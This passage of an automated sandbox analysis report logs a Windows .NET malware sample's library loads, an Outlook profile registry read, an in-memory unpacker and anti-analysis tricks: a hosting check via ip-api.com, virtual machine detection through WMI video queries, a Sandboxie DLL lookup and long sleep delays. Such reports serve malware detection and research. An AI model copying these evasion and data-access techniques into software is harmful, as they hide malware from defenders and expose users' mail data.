            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: 14posdLrGh.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 14posdLrGh.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 14posdLrGh.exe, duniwecusacejutixoqoutput.cs.Net Code: yoluqih System.Reflection.Assembly.Load(byte[])
            Source: 14posdLrGh.exe, duniwecusacejutixoqoutput.cs.Net Code: yoluqih
            Source: 14posdLrGh.exeStatic PE information: 0xEBCB0C67 [Wed May 11 11:45:43 2095 UTC]
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_00888460 push eax; ret 0_2_00888461
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_0088D67A push F0054711h; retn 0060h0_2_0088D685
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_00883EF7 push ebp; ret 0_2_00883EF8
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_057D29E0 pushad ; retf 0_2_057D29ED
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_059D6A00 push eax; ret 0_2_059D6A01
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05AD5C82 push 1405ACE0h; iretd 0_2_05AD5C8D
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05AD6299 push CC05ACE6h; iretd 0_2_05AD62A5
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05CD51AE push ebx; retf 0_2_05CD51BA
            Source: C:\Users\user\Desktop\14posdLrGh.exeCode function: 0_2_05CF3DE1 push es; ret 0_2_05CF3DF0
            Source: C:\Users\user\Desktop\14posdLrGh.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: 14posdLrGh.exe PID: 6516, type: MEMORYSTR
            Check if machine is in data center or colocation facility
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\14posdLrGh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\14posdLrGh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\14posdLrGh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: 14posdLrGh.exe, 00000000.00000002.1677581277.000000000275F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\14posdLrGh.exeMemory allocated: 880000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeMemory allocated: 2490000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeMemory allocated: 23C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599871Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599746Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599587Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599464Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599353Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 599211Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598677Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598557Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598451Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598343Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598233Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597766Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597198Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596859Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596750Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596640Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596374Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 596047Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595938Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595719Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595594Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595484Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595266Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 595156Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeWindow / User API: threadDelayed 2066Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exeWindow / User API: threadDelayed 4842Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -24903104499507879s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 2304Thread sleep count: 2066 > 30Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -599871s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -599746s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -599587s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 2304Thread sleep count: 4842 > 30Jump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -599464s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -599353s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -599211s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -598677s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -598557s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -598451s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -598343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -598233s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -598016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -597891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -597766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -597656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -597547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -597438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -597313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -597198s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -596969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -596859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -596750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -596640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -596484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -596374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -596266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -596156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -596047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -595938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -595828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -595719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -595594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -595484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -595375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14posdLrGh.exe TID: 5728Thread sleep time: -595266s >= -30000sJump to behavior
